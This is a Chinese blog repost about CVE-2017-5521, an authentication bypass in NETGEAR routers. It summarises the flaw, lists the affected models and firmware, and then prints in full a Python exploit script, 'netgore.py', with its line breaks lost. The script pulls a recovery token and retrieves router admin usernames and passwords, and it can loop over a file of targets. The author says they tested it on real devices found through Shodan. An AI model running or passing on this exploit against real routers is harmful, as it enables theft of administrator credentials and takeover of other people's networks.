SpiderLabs昨天發布的漏洞， 用戶訪問路由器的web控制界面嘗試身份驗證，然后又取消身份驗證，用戶就會被重定向到一個頁面暴露密碼恢復的token。然后通過passwordrecovered.cgi?id=TOKEN獲取到路由器管理員密碼。

漏洞細節

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911

漏洞影響范圍：

Finding 1: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521 Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest) # AC1450 V1.0.0.22_1.0.10 # AC1450 V1.0.0.14_1.0.6 # D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected) # D6400 V1.0.0.34_1.3.34 # D6400 V1.0.0.38_1.1.38 # D6400 V1.0.0.22_1.0.22 # DC112A V1.0.0.30_1.0.60 (Latest) # DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected) # JNDR3000 V1.0.0.18_1.0.16 (Latest) # R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected) # R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected) # R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected) # R6300 V1.0.2.78_1.0.58 (Latest) # R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched) # R6300v2 V1.0.3.30_10.0.73 # R6700 V1.0.1.14_10.0.29 (Latest beta) # R6700 V1.0.0.26_10.0.26 (Latest stable) # R6700 V1.0.0.24_10.0.18 # R6900 V1.0.0.4_1.0.10 (Latest) # R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched) # R8300 V1.0.2.48_1.0.52 # R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched) # R8500 V1.0.2.26_1.0.41 # R8500 V1.0.0.56_1.0.28 # R8500 V1.0.0.20_1.0.11 # VEGN2610 V1.0.0.35_1.0.35 (Latest) # VEGN2610 V1.0.0.29_1.0.29 # VEGN2610 V1.0.0.27_1.0.27 # WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected) # WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected) # WNDR3700v3 V1.0.0.38_1.0.31 (Latest) # WNDR4000 V1.0.2.4_9.1.86 (Latest) # WNDR4500 V1.0.1.40_1.0.68 (Latest) # WNDR4500v2 V1.0.0.60_1.0.38 (Latest) # WNDR4500v2 V1.0.0.42_1.0.25 # WGR614v10 V1.0.2.60_60.0.85NA (Latest) # WGR614v10 V1.0.2.58_60.0.84NA # WGR614v10 V1.0.2.54_60.0.82NA # WN3100RP V1.0.0.14_1.0.19 (Latest) # WN3100RP V1.0.0.6_1.0.12# Lenovo R3220 V1.0.0.16_1.0.16 (Latest) # Lenovo R3220 V1.0.0.13_1.0.13Finding 2: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest) # AC1450 V1.0.0.22_1.0.10 # AC1450 V1.0.0.14_1.0.6 # D6300 V1.0.0.96_1.1.96 (Latest) # D6300B V1.0.0.36_1.0.36 # D6300B V1.0.0.32_1.0.32 # D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched) # D6400 V1.0.0.22_1.0.22 # DC112A V1.0.0.30_1.0.60 (Latest) # DGN2200v4 V1.0.0.76_1.0.76 (Latest) # DGN2200v4 V1.0.0.66_1.0.66 # DGN2200Bv4 V1.0.0.68_1.0.68 (Latest) # JNDR3000 V1.0.0.18_1.0.16 (Latest) # R6200 V1.0.1.56_1.0.43 (Latest) # R6200 V1.0.1.52_1.0.41 # R6200 V1.0.1.48_1.0.37 # R6200v2 V1.0.3.10_10.1.10 (Latest) # R6200v2 V1.0.1.20_1.0.18 # R6250 V1.0.4.6_10.1.12 (Latest beta) # R6250 V1.0.4.2_10.1.10 (Latest stable) # R6250 V1.0.1.84_1.0.78 # R6300 V1.0.2.78_1.0.58 (Latest) # R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched) # R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.) # R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched) # R6700 V1.0.0.26_10.0.26 (Latest) # R6700 V1.0.0.24_10.0.18 # R6900 V1.0.0.4_1.0.10 (Latest) # R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched) # R7000 V1.0.4.30_1.1.67 # R7900 V1.0.1.8_10.0.14 (Latest beta) # R7900 V1.0.1.4_10.0.12 (Latest stable) # R7900 V1.0.0.10_10.0.7 # R7900 V1.0.0.8_10.0.5 # R7900 V1.0.0.6_10.0.4 # R8000 V1.0.3.26_1.1.18 (Latest beta) # R8000 V1.0.3.4_1.1.2 (Latest stable) # R8300 V1.0.2.48_1.0.52 # R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched) # R8500 V1.0.2.30_1.0.43 # VEGN2610 V1.0.0.35_1.0.35 (Latest) # VEGN2610 V1.0.0.27_1.0.27 # VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest) # VEVG2660 V1.0.0.23_1.0.23 # WNDR3400v2 V1.0.0.52_1.0.81 (Latest) # WNDR3400v3 V1.0.1.4_1.0.52 (Latest) # WNDR3400v3 V1.0.1.2_1.0.51 # WNDR3400v3 V1.0.0.22_1.0.29 # WNDR3700v3 V1.0.0.38_1.0.31 (Latest) # WNDR4000 V1.0.2.4_9.1.86 (Latest) # WNDR4500 V1.0.1.40_1.0.68 (Latest) # WNDR4500 V1.0.1.6_1.0.24 # WNDR4500v2 V1.0.0.60_1.0.38 (Latest) # WNDR4500v2 V1.0.0.50_1.0.30 # WNR1000v3 V1.0.2.68_60.0.93NA (Latest) # WNR1000v3 V1.0.2.62_60.0.87 (Latest) # WNR3500Lv2 V1.2.0.34_40.0.75 (Latest) # WNR3500Lv2 V1.2.0.32_40.0.74 # WGR614v10 V1.0.2.60_60.0.85NA (Latest) # WGR614v10 V1.0.2.58_60.0.84NA # WGR614v10 V1.0.2.54_60.0.82NA# Lenovo R3220 V1.0.0.16_1.0.16 (Latest) # Lenovo R3220 V1.0.0.13_1.0.13

?

Netgear漏洞利用exploit：

## netgore.py import sys import requestsdef scrape(text, start_trig, end_trig):if text.find(start_trig) != -1:return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]else:return "i_dont_speak_english"def exp1(ip,port):#disable nasty insecure ssl warningrequests.packages.urllib3.disable_warnings()#1st stage - get token# ip = sys.argv[1]# port = sys.argv[2]url = 'http://' + ip + ':' + port + '/'try:r = requests.get(url)except:url = 'https://' + ip + ':' + port + '/'r = requests.get(url, verify=False)model = r.headers.get('WWW-Authenticate')if model is not None:print "Attcking: " + model[13:-1]else:print "not a netgear router"#sys.exit(0)token = scrape(r.text, 'unauth.cgi?id=', '\"')if token == 'i_dont_speak_english':print "not vulnerable"#sys.exit(0)returnprint "token found: " + token#2nd stage - pass the token - get the passwordurl = url + 'passwordrecovered.cgi?id=' + tokenr = requests.post(url, verify=False)#profitif r.text.find('left\">') != -1:username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))username = scrape(username, '>', '\'')password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))password = scrape(password, '>', '\'')if username == "i_dont_speak_english":username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))else:print "not vulnerable becuse password recovery IS set"# sys.exit(0)return#html encoding pops out of nowhere, lets replace thatpassword = password.replace("#","#")password = password.replace("&","&")print "user: " + usernameprint "pass: " + passworddef exp2(ip,port):#disable nasty insecure ssl warningrequests.packages.urllib3.disable_warnings()#1st stage# ip = sys.argv[1]# port = sys.argv[2]url = 'http://' + ip + ':' + port + '/'try:r = requests.get(url)except:url = 'https://' + ip + ':' + port + '/'r = requests.get(url, verify=False)model = r.headers.get('WWW-Authenticate')if model is not None:print "Attcking: " + model[13:-1]else:print "not a netgear router"#sys.exit(0)return#2nd stageurl = url + 'passwordrecovered.cgi?id=get_rekt'try:r = requests.post(url, verify=False)except:print "not vulnerable router"#sys.exit(0)#profitif r.text.find('left\">') != -1:username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))username = scrape(username, '>', '\'')password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))password = scrape(password, '>', '\'')if username == "i_dont_speak_english":username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))else:print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"return# sys.exit(0)#html encoding pops out of nowhere, lets replace thatpassword = password.replace("#","#")password = password.replace("&","&")print "user: " + usernameprint "pass: " + passwordif __name__ == "__main__":if len(sys.argv) > 1:ip = sys.argv[1]port = sys.argv[2]print '---------start------------'print 'target',ip,port print '---------exp1------------'exp1(ip,port)print '---------exp2------------'exp2(ip,port)else:f = open('target.txt')for line in f:line = line.strip()l = line.split(' ')if len(l) > 1:#print lip = l[0]port = l[2]print '---------start------------'print 'target',ip,port print '---------exp1------------'exp1(ip,port)print '---------exp2------------'exp2(ip,port)f.close()

　　

　

shodan搜索后測試了幾個netgear設備，這個漏洞很清真：

轉載于:https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html

總結

以上是生活随笔為你收集整理的CVE-2017-5521: Bypassing Authentication on NETGEAR Routers（Netgear认证绕过漏洞）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。